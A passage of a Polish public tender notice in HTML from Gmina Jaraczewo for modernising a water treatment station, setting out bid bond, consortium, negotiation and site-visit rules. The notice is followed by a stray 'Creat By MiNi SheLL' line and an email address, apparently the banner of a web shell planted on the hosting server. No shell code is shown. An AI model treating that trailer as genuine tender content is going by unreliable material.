Zamawiającego, jest obowiązany<br/>udowodnić w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104 – 107<br/>ustawy PZP, np. stosownych opisów technicznych i/lub funkcjonalnych, że proponowane rozwiązania w równoważnym<br/>stopniu spełniają wymagania określone w opisie przedmiotu zamówienia oraz że obiekt budowlany, dostawa lub usługa,<br/>spełniają wymagania dotyczące wydajności lub funkcjonalności określone przez Zamawiającego <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe na potwierdzenie, że proponowane rozwiązania równoważne, na które powołuje się<br/>Wykonawca, w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia oraz że obiekt<br/>budowlany, dostawa lub usługa, spełniają wymagania dotyczące wydajności lub funkcjonalności określone przez<br/>Zamawiającego, np. stosowne opisy techniczne i/ lub funkcjonalne <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2 do SWZ i jeśli dotyczy: oświadczenie podmiotu udostępniającego zasoby dotyczące spełniania warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby oraz dotyczące przesłanek wykluczenia z postępowania – zgodnie z Załącznikiem nr 3 do SWZ.<br/>2.	Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3.	Wykonawca wraz z ofertą (oprócz ww. oświadczeń) zobowiązany jest złożyć:<br/>1) dokument potwierdzający umocowanie do złożenia oferty, jeżeli umocowanie to nie wynika z odpowiednich rejestrów / ewidencji,<br/>2) pełnomocnictwo do reprezentowania wykonawców ubiegających się wspólnie o udzielenie zamówienia w Postępowaniu albo do reprezentowania w Postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (dotyczy wyłącznie wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>3) oświadczenie, o którym mowa w art. 117 ust. 4 P.z.p. (dotyczy wyłącznie wykonawców wspólnie ubiegających się o udzielenie zamówienia, w przypadku, o którym mowa w art. 117 ust. 2 i 3 P.z.p.) – wzór oświadczenia wykonawców wspólnie ubiegających się o zamówienie – załącznik nr 9 do SWZ,<br/>4) zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 4 P.z.p., spełniające wymogi, o których mowa w art. 118 ust. 4 P.z.p. (dotyczy wyłącznie Wykonawcy, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby) – Wymagany zakres zobowiązania określa art. 118 ust. 4 ustawy Pzp- załącznik nr 8 do SWZ,<br/>5) KOSZTORYSY OFERTOWE, zgodnie ze wzorem stanowiącym załącznik nr 10 do SWZ,<br/>6) dowód wniesienia wadium,<br/>7) przedmiotowe środki dowodowe, w przypadku gdy Wykonawca powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego – jeżeli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>20 000,00 zł (słownie: dwadzieścia tysięcy złotych 00/100). <br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Spółdzielczym <br/>w Jarocinie  nr rachunku 95 8427 0009 0303 7823 2000 0003   z dopiskiem<br/>„Wadium – P-zp.271.01.09.2024 – Poprawa retencji wody pitnej – modernizacja Stacji Uzdatniania Wody w Rusku wraz z budową instalacji odnawialnego źródła energii”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP <br/>2)	z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Gmina Jaraczewo<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania <br/>i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/>o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5.	W przypadku, o którym mowa w ust. 4, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy – Załącznik nr 9 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty <br/>w zakresie uregulowanym w art. 454-455 PZP oraz wskazanym we wzorach umów, stanowiących Załącznik nr 7 do SWZ.<br/>Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/953745</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-30 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-28</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 1) Zamawiający korzysta z uprawnienia, o jakim stanowi art. 288 ust. 1 ustawy Pzp i zastrzega sobie prawo do zaproszenia do negocjacji maksymalnie trzech Wykonawców, których oferty przedstawiają najkorzystniejszy stosunek jakości do ceny, obliczony na podstawie kryteriów oceny ofert, określonych w pkt XX SWZ.<br/>2) W przypadku podjęcia decyzji o prowadzeniu negocjacji w pierwszym kroku zamawiający poinformuje równocześnie wszystkich wykonawców, którzy złożyli oferty, o wykonawcach:<br/>a) których oferty nie zostały odrzucone, oraz punktacji przyznanej ofertom w każdym kryterium oceny ofert i łącznej punktacji,<br/>b) których oferty zostały odrzucone,<br/>c) którzy nie zostali zakwalifikowani do negocjacji, oraz punktacji przyznanej ich ofertom <br/>w każdym kryterium oceny ofert i łącznej punktacji, <br/>- podając uzasadnienie faktyczne i prawne.<br/>3) Zamawiający w zaproszeniu do negocjacji wskaże miejsce, termin i sposób prowadzenia negocjacji oraz kryteria oceny ofert, w ramach których będą prowadzone negocjacje w celu ulepszenia treści ofert.<br/>4) Prowadzone negocjacje mają poufny charakter. Żadna ze stron nie może, bez zgody drugiej strony, ujawniać informacji technicznych i handlowych związanych z negocjacjami. Zgoda jest udzielana w odniesieniu do konkretnych informacji i przed ich ujawnieniem.<br/>5) Po zakończeniu negocjacji z wszystkimi wykonawcami, zamawiający informuje o tym fakcie uczestników negocjacji oraz zaprasza ich do składania ofert dodatkowych.<br/>6) Zaproszenie do złożenia ofert dodatkowych będzie zawierać co najmniej:<br/>a) nazwę oraz adres zamawiającego, numer telefonu, adres poczty elektronicznej oraz strony internetowej prowadzonego postępowania;<br/>b) sposób i termin składania ofert dodatkowych oraz język lub języki, w jakich muszą one być sporządzone, oraz termin otwarcia tych ofert.<br/>7) Wykonawca może złożyć ofertę dodatkową, która zawiera nowe propozycje w zakresie treści oferty podlegających ocenie w ramach kryteriów oceny ofert wskazanych przez zamawiającego <br/>w zaproszeniu do negocjacji.<br/>8) Oferta dodatkowa nie może być mniej korzystna w żadnym z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż oferta złożona w odpowiedzi na ogłoszenie o zamówieniu.<br/>9) Oferta przestaje wiązać wykonawcę w zakresie, w jakim złoży on ofertę dodatkową zawierającą korzystniejsze propozycje w ramach każdego z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji.<br/>10) Oferta dodatkowa, która jest mniej korzystna w którymkolwiek z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż oferta złożona w odpowiedzi na ogłoszenie o zamówieniu, podlega odrzuceniu. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający przewiduje obowiązek odbycia przez Wykonawcę wizji lokalnej. Zamawiający wyznacza termin wizji<br/>lokalnej w dniu: 17 lipca 2024 r. godz. 10:00 (miejsce spotkania: siedziba Zamawiającego, tj. Urząd Miasta i Gminy<br/>Jaraczewo, ul. Jarocińska 1, 63-233 Jaraczewo).<br/>2. W celu potwierdzenia udziału w wizji lokalnej Wykonawca winien podpisać się na liście obecności (dostępnej na miejscu),<br/>podając nazwę i adres firmy, a także imię i nazwisko osoby reprezentującej Wykonawcę.<br/>3. Zamawiający informuje, że w trakcie wizji lokalnej nie będzie udzielał odpowiedzi na pytania dotyczące treści SWZ, w tym<br/>opisu przedmiotu zamówienia.<br/>UWAGA: Złożenie oferty bez odbycia wizji lokalnej (tj. bez potwierdzenia obecności Wykonawcy na liście obecności)<br/>skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 18 Pzp.<br/>4. Koszty Wykonawcy związane z udziałem w wizji lokalnej poniesie Wykonawca.<br/>5. Z post. o udzielenie zam. wyklucza się Wyk. na podstawie (oprócz przesłanek wskazanych powyżej) art. 7 ust. 1 ustawy z<br/>dnia 13.04.22 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezp. narodowego (Dz. U. z 2023 r., poz. 1497 ze zm.<br/>6. Zadanie dofinansowane z Rządowego Funduszu Polski Ład Program Inwestycji Strategicznych – VIII edycja.<br/>7. Termin zakończenia całości robót z zakresu podstawowego ustala się na 13 miesięcy od dnia zawarcia niniejszej umowy zgodnie z harmonogramem rzeczowo- finansowym. Za zakończenie wykonania zamówienia uważa się wykonanie całości robót budowlanych oraz uzyskanie pozwolenia na uruchomienie i podawanie wody do sieci wodociągowej od Państwowego Inspektora Sanitarnego oraz ostateczną decyzję o pozwoleniu na użytkowanie wydaną przez Powiatowego Inspektora Nadzoru Budowlanego.

Creat By MiNi SheLL
Email: jattceo@gmail.com